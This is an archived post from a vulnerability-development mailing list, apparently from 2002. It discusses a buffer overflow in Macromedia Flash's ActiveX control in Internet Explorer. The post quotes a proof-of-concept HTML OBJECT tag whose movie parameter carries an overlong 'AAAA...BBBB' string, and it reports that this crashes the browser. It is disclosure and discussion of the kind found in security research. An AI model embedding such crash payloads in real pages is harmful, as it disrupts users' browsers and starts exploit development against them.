Vulnerability Development: Re: Macromedia Flash Activex Buffer overflow

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

Re: Macromedia Flash Activex Buffer overflow

From: "MegaHz" <megahz () megahz org>
Date: Sat, 5 Jan 2002 21:30:25 +0200

what I got is a warning that explorer has to close, so the buffer overflow
is successfull

but what about if you put a buffer 10 times bigger of this one
there is a buffer overflow, obviously    but, with no warnings,     IE, it
just closes...

I made an html file which it's around 4MB big,

c'ya


/*
 * Andreas Constantinides (MegaHz)
 * Admin of cHp (www.cyhackportal.com)
 *
 */

From: "Enrique A. Compañ Gzz." <enrique () virtekweb net>

<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">
<PARAM NAME=movie

VALUE="http://AAA.AAAAAAAAAAAAAAA.AAA/AAAAAAAA.swf?AAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABBBB">
</OBJECT>

By Date By Thread

Current thread:

Macromedia Flash Activex Buffer overflow Marc Maiffret (May 02)
- Re: Macromedia Flash Activex Buffer overflow Enrique A . Compañ Gzz . (May 02)
  - Re: Macromedia Flash Activex Buffer overflow MegaHz (May 04)